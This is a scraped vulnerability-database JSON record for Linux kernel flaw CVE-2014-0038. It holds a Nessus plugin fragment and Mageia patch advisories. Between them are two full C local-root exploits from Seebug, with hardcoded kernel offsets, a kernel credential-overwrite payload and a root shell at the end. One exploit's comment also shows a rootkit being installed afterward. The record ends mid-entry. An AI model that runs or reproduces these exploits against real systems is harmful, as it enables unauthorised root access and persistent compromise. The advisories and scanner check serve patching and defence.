script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'AF_PACKET chocobo_root Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/02/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/04/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/04/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:kernel-uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:kernel-uek-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:3.3\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"OracleVM Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleVM/release\", \"Host/OracleVM/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/OracleVM/release\");\nif (isnull(release) || \"OVS\" >!< release) audit(AUDIT_OS_NOT, \"OracleVM\");\nif (! preg(pattern:\"^OVS\" + \"3\\.3\" + \"(\\.[0-9]|$)\", string:release)) audit(AUDIT_OS_NOT, \"OracleVM 3.3\", \"OracleVM \" + release);\nif (!get_kb_item(\"Host/OracleVM/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"OracleVM\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"OVS3.3\", reference:\"kernel-uek-3.8.13-118.17.4.el6uek\")) flag++;\nif (rpm_check(release:\"OVS3.3\", reference:\"kernel-uek-firmware-3.8.13-118.17.4.el6uek\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel-uek / kernel-uek-firmware\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T16:38:30", "description": "No description provided by source.", "cvss3": {}, "published": "2014-07-01T00:00:00", "title": "linux 3.4+ - Local Root (CONFIG_X86_X32=y)", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0038"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-84683", "id": "SSV:84683", "sourceData": "\n /* \r\n*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*\r\nrecvmmsg.c - linux 3.4+ local root (CONFIG_X86_X32=y)\r\nCVE-2014-0038 / x32 ABI with recvmmsg\r\nby rebel @ irc.smashthestack.org\r\n-----------------------------------\r\n\r\ntakes about 13 minutes to run because timeout-&#62;tv_sec is decremented\r\nonce per second and 0xff*3 is 765.\r\n\r\nsome things you could do while waiting:\r\n * watch http://www.youtube.com/watch?v=OPyZGCKu2wg 3 times\r\n * read https://wiki.ubuntu.com/Security/Features and smirk a few times\r\n * brew some coffee\r\n * stare at the countdown giggly with anticipation\r\n\r\ncould probably whack the high bits of some pointer with nanoseconds,\r\nbut that would require a bunch of nulls before the pointer and then\r\nreading an oops from dmesg which isn&#39;t that elegant.\r\n\r\n&net_sysctl_root.permissions is nice because it has 16 trailing nullbytes\r\n\r\nhardcoded offsets because I only saw this on ubuntu & kallsyms is protected\r\nanyway..\r\n\r\nsame principle will work on 32bit but I didn&#39;t really find any major\r\ndistros shipping with CONFIG_X86_X32=y\r\n\r\nuser@ubuntu:~$ uname -a\r\nLinux ubuntu 3.11.0-15-generic #23-Ubuntu SMP Mon Dec 9 18:17:04 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux\r\nuser@ubuntu:~$ gcc recvmmsg.c -o recvmmsg\r\nuser@ubuntu:~$ ./recvmmsg\r\nbyte 3 / 3.. ~0 secs left. \r\nw00p w00p!\r\n# id\r\nuid=0(root) gid=0(root) groups=0(root)\r\n# sh phalanx-2.6b-x86_64.sh\r\nunpacking..\r\n\r\n:)=\r\n\r\ngreets to my homeboys kaliman, beist, capsl & all of #social\r\n\r\nSat Feb 1 22:15:19 CET 2014\r\n% rebel %\r\n*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*\r\n*/\r\n\r\n#define _GNU_SOURCE\r\n#include &#60;netinet/ip.h&#62;\r\n#include &#60;stdio.h&#62;\r\n#include &#60;stdlib.h&#62;\r\n#include &#60;string.h&#62;\r\n#include &#60;sys/socket.h&#62;\r\n#include &#60;unistd.h&#62;\r\n#include &#60;sys/syscall.h&#62;\r\n#include &#60;sys/mman.h&#62;\r\n#include &#60;sys/types.h&#62;\r\n#include &#60;sys/stat.h&#62;\r\n#include &#60;fcntl.h&#62;\r\n#include &#60;sys/utsname.h&#62;\r\n\r\n#define __X32_SYSCALL_BIT 0x40000000\r\n#undef __NR_recvmmsg\r\n#define __NR_recvmmsg (__X32_SYSCALL_BIT + 537)\r\n#define VLEN 1\r\n#define BUFSIZE 200\r\n\r\nint port;\r\n\r\nstruct offset {\r\n char *kernel_version;\r\n unsigned long dest; // net_sysctl_root + 96\r\n unsigned long original_value; // net_ctl_permissions\r\n unsigned long prepare_kernel_cred;\r\n unsigned long commit_creds;\r\n};\r\n\r\nstruct offset offsets[] = {\r\n {&#34;3.11.0-15-generic&#34;,0xffffffff81cdf400+96,0xffffffff816d4ff0,0xffffffff8108afb0,0xffffffff8108ace0}, // Ubuntu 13.10\r\n {&#34;3.11.0-12-generic&#34;,0xffffffff81cdf3a0,0xffffffff816d32a0,0xffffffff8108b010,0xffffffff8108ad40}, // Ubuntu 13.10\r\n {&#34;3.8.0-19-generic&#34;,0xffffffff81cc7940,0xffffffff816a7f40,0xffffffff810847c0, 0xffffffff81084500}, // Ubuntu 13.04\r\n {NULL,0,0,0,0}\r\n};\r\n\r\nvoid udp(int b) {\r\n int sockfd;\r\n struct sockaddr_in servaddr,cliaddr;\r\n int s = 0xff+1;\r\n\r\n if(fork() == 0) {\r\n while(s &#62; 0) {\r\n fprintf(stderr,&#34;\\rbyte %d / 3.. ~%d secs left \\b\\b\\b\\b&#34;,b+1,3*0xff - b*0xff - (0xff+1-s));\r\n sleep(1);\r\n s--;\r\n fprintf(stderr,&#34;.&#34;);\r\n }\r\n\r\n sockfd = socket(AF_INET,SOCK_DGRAM,0);\r\n bzero(&servaddr,sizeof(servaddr));\r\n servaddr.sin_family = AF_INET;\r\n servaddr.sin_addr.s_addr=htonl(INADDR_LOOPBACK);\r\n servaddr.sin_port=htons(port);\r\n sendto(sockfd,&#34;1&#34;,1,0,(struct sockaddr *)&servaddr,sizeof(servaddr));\r\n exit(0);\r\n }\r\n\r\n}\r\n\r\nvoid trigger() {\r\n open(&#34;/proc/sys/net/core/somaxconn&#34;,O_RDONLY);\r\n\r\n if(getuid() != 0) {\r\n fprintf(stderr,&#34;not root, ya blew it!\\n&#34;);\r\n exit(-1);\r\n }\r\n\r\n fprintf(stderr,&#34;w00p w00p!\\n&#34;);\r\n system(&#34;/bin/sh -i&#34;);\r\n}\r\n\r\ntypedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);\r\ntypedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);\r\n_commit_creds commit_creds;\r\n_prepare_kernel_cred prepare_kernel_cred;\r\n\r\n// thx bliss\r\nstatic int __attribute__((regparm(3)))\r\ngetroot(void *head, void * table)\r\n{\r\n commit_creds(prepare_kernel_cred(0));\r\n return -1;\r\n}\r\n\r\nvoid __attribute__((regparm(3)))\r\ntrampoline()\r\n{\r\n asm(&#34;mov $getroot, %rax; call *%rax;&#34;);\r\n}\r\n\r\nint main(void)\r\n{\r\n int sockfd, retval, i;\r\n struct sockaddr_in sa;\r\n struct mmsghdr msgs[VLEN];\r\n struct iovec iovecs[VLEN];\r\n char buf[BUFSIZE];\r\n long mmapped;\r\n struct utsname u;\r\n struct offset *off = NULL;\r\n\r\n uname(&u);\r\n\r\n for(i=0;offsets[i].kernel_version != NULL;i++) {\r\n if(!strcmp(offsets[i].kernel_version,u.release)) {\r\n off = &offsets[i];\r\n break;\r\n }\r\n }\r\n\r\n if(!off) {\r\n fprintf(stderr,&#34;no offsets for this kernel version..\\n&#34;);\r\n exit(-1);\r\n }\r\n\r\n mmapped = (off-&#62;original_value & ~(sysconf(_SC_PAGE_SIZE) - 1));\r\n mmapped &= 0x000000ffffffffff;\r\n\r\n srand(time(NULL));\r\n port = (rand() % 30000)+1500;\r\n\r\n commit_creds = (_commit_creds)off-&#62;commit_creds;\r\n prepare_kernel_cred = (_prepare_kernel_cred)off-&#62;prepare_kernel_cred;\r\n\r\n mmapped = (long)mmap((void *)mmapped, sysconf(_SC_PAGE_SIZE)*3, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);\r\n\r\n if(mmapped == -1) {\r\n perror(&#34;mmap()&#34;);\r\n exit(-1);\r\n }\r\n\r\n memset((char *)mmapped,0x90,sysconf(_SC_PAGE_SIZE)*3);\r\n\r\n memcpy((char *)mmapped + sysconf(_SC_PAGE_SIZE), (char *)&trampoline, 300);\r\n\r\n if(mprotect((void *)mmapped, sysconf(_SC_PAGE_SIZE)*3, PROT_READ|PROT_EXEC) != 0) {\r\n perror(&#34;mprotect()&#34;);\r\n exit(-1);\r\n }\r\n \r\n sockfd = socket(AF_INET, SOCK_DGRAM, 0);\r\n if (sockfd == -1) {\r\n perror(&#34;socket()&#34;);\r\n exit(-1);\r\n }\r\n\r\n sa.sin_family = AF_INET;\r\n sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);\r\n sa.sin_port = htons(port);\r\n\r\n if (bind(sockfd, (struct sockaddr *) &sa, sizeof(sa)) == -1) {\r\n perror(&#34;bind()&#34;);\r\n exit(-1);\r\n }\r\n\r\n memset(msgs, 0, sizeof(msgs));\r\n\r\n iovecs[0].iov_base = &buf;\r\n iovecs[0].iov_len = BUFSIZE;\r\n msgs[0].msg_hdr.msg_iov = &iovecs[0];\r\n msgs[0].msg_hdr.msg_iovlen = 1;\r\n\r\n for(i=0;i &#60; 3 ;i++) {\r\n udp(i);\r\n retval = syscall(__NR_recvmmsg, sockfd, msgs, VLEN, 0, (void *)off-&#62;dest+7-i);\r\n if(!retval) {\r\n fprintf(stderr,&#34;\\nrecvmmsg() failed\\n&#34;);\r\n }\r\n }\r\n\r\n close(sockfd); \r\n\r\n fprintf(stderr,&#34;\\n&#34;);\r\n\r\n trigger();\r\n}\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-84683", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T16:38:02", "description": "No description provided by source.", "cvss3": {}, "published": "2014-07-01T00:00:00", "title": "Linux 3.4+ - Arbitrary write with CONFIG_X86_X32", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0038"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-84682", "id": "SSV:84682", "sourceData": "\n /*\r\n * Local root exploit for CVE-2014-0038.\r\n *\r\n * https://raw.github.com/saelo/cve-2014-0038/master/timeoutpwn.c\r\n *\r\n * Bug: The X86_X32 recvmmsg syscall does not properly sanitize the timeout pointer\r\n * passed from userspace.\r\n *\r\n * Exploit primitive: Pass a pointer to a kernel address as timeout for recvmmsg,\r\n * if the original byte at that address is known it can be overwritten\r\n * with known data.\r\n * If the least significant byte is 0xff, waiting 255 seconds will turn it into a 0x00.\r\n *\r\n * Restrictions: The first long at the passed address (tv_sec) has to be positive\r\n * and the second long (tv_nsec) has to be smaller than 1000000000.\r\n *\r\n * Overview: Target the release function pointer of the ptmx_fops structure located in\r\n * non initialized (and thus writable) kernel memory. Zero out the three most\r\n * significant bytes and thus turn it into a pointer to an address mappable in\r\n * user space.\r\n * The release pointer is used as it is followed by 16 0x00 bytes (so the tv_nsec\r\n * is valid).\r\n * Open /dev/ptmx, close it and enjoy.\r\n *\r\n * Not very beautiful but should be fairly reliable if symbols can be resolved.\r\n *\r\n * Tested on Ubuntu 13.10\r\n *\r\n * gcc timeoutpwn.c -o pwn && ./pwn\r\n *\r\n * Written by saelo\r\n */\r\n#define _GNU_SOURCE\r\n#include &#60;netinet/ip.h&#62;\r\n#include &#60;stdio.h&#62;\r\n#include &#60;stdlib.h&#62;\r\n#include &#60;time.h&#62;\r\n#include &#60;string.h&#62;\r\n#include &#60;unistd.h&#62;\r\n#include &#60;fcntl.h&#62;\r\n#include &#60;sys/socket.h&#62;\r\n#include &#60;sys/stat.h&#62;\r\n#include &#60;sys/syscall.h&#62;\r\n#include &#60;sys/wait.h&#62;\r\n#include &#60;sys/mman.h&#62;\r\n\r\n#define __X32_SYSCALL_BIT 0x40000000\r\n#undef __NR_recvmmsg\r\n#define __NR_recvmmsg (__X32_SYSCALL_BIT + 537)\r\n\r\n#define BUFSIZE 200\r\n#define PAYLOADSIZE 0x2000\r\n#define FOPS_RELEASE_OFFSET 13*8\r\n\r\n/*\r\n * Adapt these addresses for your need.\r\n * see /boot/System.map* or /proc/kallsyms\r\n * These are the offsets from ubuntu 3.11.0-12-generic.\r\n */\r\n#define PTMX_FOPS 0xffffffff81fb30c0LL\r\n#define TTY_RELEASE 0xffffffff8142fec0LL\r\n#define COMMIT_CREDS 0xffffffff8108ad40LL\r\n#define PREPARE_KERNEL_CRED 0xffffffff8108b010LL\r\n\r\ntypedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);\r\ntypedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);\r\n\r\n/*\r\n * Match signature of int release(struct inode*, struct file*).\r\n *\r\n * See here: http://grsecurity.net/~spender/exploits/enlightenment.tgz\r\n */\r\nint __attribute__((regparm(3)))\r\nkernel_payload(void* foo, void* bar)\r\n{\r\n _commit_creds commit_creds = (_commit_creds)COMMIT_CREDS;\r\n _prepare_kernel_cred prepare_kernel_cred = (_prepare_kernel_cred)PREPARE_KERNEL_CRED;\r\n\r\n *((int*)(PTMX_FOPS + FOPS_RELEASE_OFFSET + 4)) = -1; // restore pointer\r\n commit_creds(prepare_kernel_cred(0));\r\n\r\n return -1;\r\n}\r\n\r\n/*\r\n * Write a zero to the byte at then given address.\r\n * Only works if the current value is 0xff.\r\n */\r\nvoid zero_out(long addr)\r\n{\r\n int sockfd, retval, port, pid, i;\r\n struct sockaddr_in sa;\r\n char buf[BUFSIZE];\r\n struct mmsghdr msgs;\r\n struct iovec iovecs;\r\n\r\n srand(time(NULL));\r\n\r\n port = 1024 + (rand() % (0x10000 - 1024));\r\n\r\n sockfd = socket(AF_INET, SOCK_DGRAM, 0);\r\n if (sockfd == -1) {\r\n perror(&#34;socket()&#34;);\r\n exit(EXIT_FAILURE);\r\n }\r\n\r\n sa.sin_family = AF_INET;\r\n sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);\r\n sa.sin_port = htons(port);\r\n if (bind(sockfd, (struct sockaddr *) &sa, sizeof(sa)) == -1) {\r\n perror(&#34;bind()&#34;);\r\n exit(EXIT_FAILURE);\r\n }\r\n\r\n memset(&msgs, 0, sizeof(msgs));\r\n iovecs.iov_base = buf;\r\n iovecs.iov_len = BUFSIZE;\r\n msgs.msg_hdr.msg_iov = &iovecs;\r\n msgs.msg_hdr.msg_iovlen = 1;\r\n\r\n /*\r\n * start a seperate process to send a udp message after 255 seconds so the syscall returns,\r\n * but not after updating the timout struct and writing the remaining time into it.\r\n * 0xff - 255 seconds = 0x00\r\n */\r\n printf(&#34;clearing byte at 0x%lx\\n&#34;, addr);\r\n pid = fork();\r\n if (pid == 0) {\r\n memset(buf, 0x41, BUFSIZE);\r\n\r\n if ((sockfd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1) {\r\n perror(&#34;socket()&#34;);\r\n exit(EXIT_FAILURE);\r\n }\r\n\r\n sa.sin_family = AF_INET;\r\n sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);\r\n sa.sin_port = htons(port);\r\n\r\n printf(&#34;waiting 255 seconds...\\n&#34;);\r\n for (i = 0; i &#60; 255; i++) {\r\n if (i % 10 == 0)\r\n printf(&#34;%is/255s\\n&#34;, i);\r\n sleep(1);\r\n }\r\n\r\n printf(&#34;waking up parent...\\n&#34;);\r\n sendto(sockfd, buf, BUFSIZE, 0, &sa, sizeof(sa));\r\n exit(EXIT_SUCCESS);\r\n } else if (pid &#62; 0) {\r\n retval = syscall(__NR_recvmmsg, sockfd, &msgs, 1, 0, (void*)addr);\r\n if (retval == -1) {\r\n printf(&#34;address can&#39;t be written to, not a valid timespec struct\\n&#34;);\r\n exit(EXIT_FAILURE);\r\n }\r\n waitpid(pid, 0, 0);\r\n printf(&#34;byte zeroed out\\n&#34;);\r\n } else {\r\n perror(&#34;fork()&#34;);\r\n exit(EXIT_FAILURE);\r\n }\r\n}\r\n\r\nint main(int argc, char** argv)\r\n{\r\n long code, target;\r\n int pwn;\r\n\r\n /* Prepare payload... */\r\n printf(&#34;preparing payload buffer...\\n&#34;);\r\n code = (long)mmap((void*)(TTY_RELEASE & 0x000000fffffff000LL), PAYLOADSIZE, 7, 0x32, 0, 0);\r\n memset((void*)code, 0x90, PAYLOADSIZE);\r\n code += PAYLOADSIZE - 1024;\r\n memcpy((void*)code, &kernel_payload, 1024);\r\n\r\n /*\r\n * Now clear the three most significant bytes of the fops pointer\r\n * to the release function.\r\n * This will make it point into the memory region mapped above.\r\n */\r\n printf(&#34;changing kernel pointer to point into controlled buffer...\\n&#34;);\r\n target = PTMX_FOPS + FOPS_RELEASE_OFFSET;\r\n zero_out(target + 7);\r\n zero_out(target + 6);\r\n zero_out(target + 5);\r\n\r\n /* ... and trigger. */\r\n printf(&#34;releasing file descriptor to call manipulated pointer in kernel mode...\\n&#34;);\r\n pwn = open(&#34;/dev/ptmx&#34;, &#39;r&#39;);\r\n close(pwn);\r\n\r\n if (getuid() != 0) {\r\n printf(&#34;failed to get root :(\\n&#34;);\r\n exit(EXIT_FAILURE);\r\n }\r\n\r\n printf(&#34;got root, enjoy :)\\n&#34;);\r\n return execl(&#34;/bin/bash&#34;, &#34;-sh&#34;, NULL);\r\n}\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-84682", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "mageia": [{"lastseen": "2022-04-18T11:19:34", "description": "This kernel update provides an update to 3.12.9 and fixes the following critical security issue: Pageexec reported a bug in the Linux kernel's recvmmsg syscall when called from code using the x32 ABI. An unprivileged local user could exploit this flaw to cause a denial of service (system crash) or gain administrator privileges (CVE-2014-0038) It also fixes an issue where some laptops are forced to use vesa driver & No ACPI (mga#6077) For other changes, see the referenced changelog. \n", "cvss3": {}, "published": "2014-02-08T19:09:10", "type": "mageia", "title": "Updated kernel package fixes a critical security issue\n", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0038"], "modified": "2014-02-08T19:09:10", "id": "MGASA-2014-0039", "href": "https://advisories.mageia.org/MGASA-2014-0039.html", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-18T11:19:34", "description": "This kernel update provides an update to 3.12.9 and fixes the following critical security issue: Pageexec reported a bug in the Linux kernel's recvmmsg syscall when called from code using the x32 ABI. An unprivileged local user could exploit this flaw to cause a denial of service (system crash) or gain administrator privileges (CVE-2014-0038) For other changes, see the referenced changelog: \n", "cvss3": {}, "published": "2014-02-10T20:13:44", "type": "mageia", "title": "Updated kernel-tmb packages fix CVE-2014-0038\n", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0038"], "modified": "2014-02-10T20:13:44", "id": "MGASA-2014-0046", "href": "https://advisories.mageia.org/MGASA-2014-0046.html", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-18T11:19:34", "description": "This kernel update provides an update to 3.12.9 and fixes the following critical security issue: Pageexec reported a bug in the Linux kernel's recvmmsg syscall when called from code using the x32 ABI. An unprivileged local user could exploit this flaw to cause a denial of service (system crash) or gain administrator privileges (CVE-2014-0038). Other changes are in the referenced changelog. \n", "cvss3": {}, "published": "2014-02-12T17:17:13", "type": "mageia", "title": "Updated kernel-linus package fixes security vulnerability\n", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0038"], "modified": "2014-02-12T17:17:13", "id": "MGASA-2014-0061", "href": "https://advisories.mageia.org/MGASA-2014-0061.html", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-18T11:19:34", "description": "This kernel update provides an update to 3.12.9 and fixes the following critical security issue: Pageexec reported a bug in the Linux kernel's recvmmsg syscall when called from code using the x32 ABI. An unprivileged local user could exploit this flaw to cause a denial of service (system crash) or gain administrator privileges (CVE-2014-0038) The -rt patch has been updated to -rt13. For other changes, see the referenced changelog \n", "cvss3": {}, "published": "2014-02-12T22:48:23", "type": "mageia", "title": "Updated kernel-rt packages fix security vulnerability\n", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0038"], "modified": "2014-02-12T22:48:23", "id": "MGASA-2014-0063", "href": "https://advisories.mageia.org/MGASA-2014-0063.html", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-18T11:19:34", "description": "This kernel update provides an update to the 3.10 longterm branch, currently 3.10.28 and fixes the following security issues: The ath9k_htc_set_bssid_mask function in drivers/net/wireless/ath/ath9k/htc_drv_main.c in the Linux kernel through 3.12 uses a BSSID masking approach to determine the set of MAC addresses on which a Wi-Fi device is listening, which allows remote attackers to discover the original MAC address after spoofing by sending a series of packets to MAC addresses with certain bit manipulations. (CVE-2013-4579) Pageexec reported a bug in the Linux kernel's recvmmsg syscall when called from code using the x32 ABI. An unprivileged local user could exploit this flaw to cause a denial of service (system crash) or gain administrator privileges (CVE-2014-0038) Faults during task-switch due to unhandled FPU-exceptions allow to kill processes at random on all affected kernels, resulting in local DOS in the end. One some architectures, privilege escalation under non-common circumstances is possible. (CVE-2014-1438) The hamradio yam_ioctl() code fails to initialise the cmd field of the struct yamdrv_ioctl_cfg leading to a 4-byte info leak. (CVE-2014-1446) Linux kernel built with the NetFilter Connection Tracking(NF_CONNTRACK) support for IRC protocol(NF_NAT_IRC), is vulnerable to an information leakage flaw. It could occur when communicating over direct client-to-client IRC connection(/dcc) via a NAT-ed network. Kernel attempts to mangle IRC TCP packet's content, wherein an uninitialised 'buffer' object is copied to a socket buffer and sent over to the other end of a connection. (CVE-2014-1690) It also fixes an issue where some laptops are forced to use vesa driver & No ACPI (mga#6077) For other upstream fixes, see the referenced changelogs. The proprietary fglrx driver has also been updated from Catalyst 13.11-beta6 to Catalyst 13.12 official driver. \n", "cvss3": {}, "published": "2014-02-08T19:01:59", "type": "mageia", "title": "Updated kernel package fixes one critical and a few other security issues\n", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4579", "CVE-2014-0038", "CVE-2014-1438", "CVE-2014-1446", "CVE-2014-1690"], "modified": "2014-02-08T19:01:59", "id": "MGASA-2014-0038", "href": "https://advisories.mageia.org/MGASA-2014-0038.html", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-18T11:19:34", "description": "This kernel update provides an update to the 3.10 longterm branch, currently 3.10.28 and fixes the following security issues: The ath9k_htc_set_bssid_mask function in drivers/net/wireless/ath/ath9k/htc_drv_main.c in the Linux kernel through 3.12 uses a BSSID masking approach to determine the set of MAC addresses on which a Wi-Fi device is listening, which allows remote attackers to discover the original MAC address after spoofing by sending a series of packets to MAC addresses with certain bit manipulations. (CVE-2013-4579) Pageexec reported a bug in the Linux kernel's recvmmsg syscall when called from code using the x32 ABI. An unprivileged local user could exploit this flaw to cause a denial of service (system crash) or gain administrator privileges (CVE-2014-0038) Faults during task-switch due to unhandled FPU-exceptions allow to kill processes at random on all affected kernels, resulting in local DOS in the end. One some architectures, privilege escalation under non-common circumstances is possible. (CVE-2014-1438) The hamradio yam_ioctl() code fails to initialise the cmd field of the struct yamdrv_ioctl_cfg leading to a 4-byte info leak. (CVE-2014-1446) Linux kernel built with the NetFilter Connection Tracking(NF_CONNTRACK) support for IRC protocol(NF_NAT_IRC), is vulnerable to an information leakage flaw. It could occur when communicating over direct client-to-client IRC connection(/dcc) via a NAT-ed network. Kernel attempts to mangle IRC TCP packet's content, wherein an uninitialised 'buffer' object is copied to a socket buffer and sent over to the other end of a connection. (CVE-2014-1690) For other changes, see the referenced changelogs: \n", "cvss3": {}, "published": "2014-02-11T22:38:44", "type": "mageia", "title": "Updated kernel-vserver packages fix multiple vulnerabilities\n", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 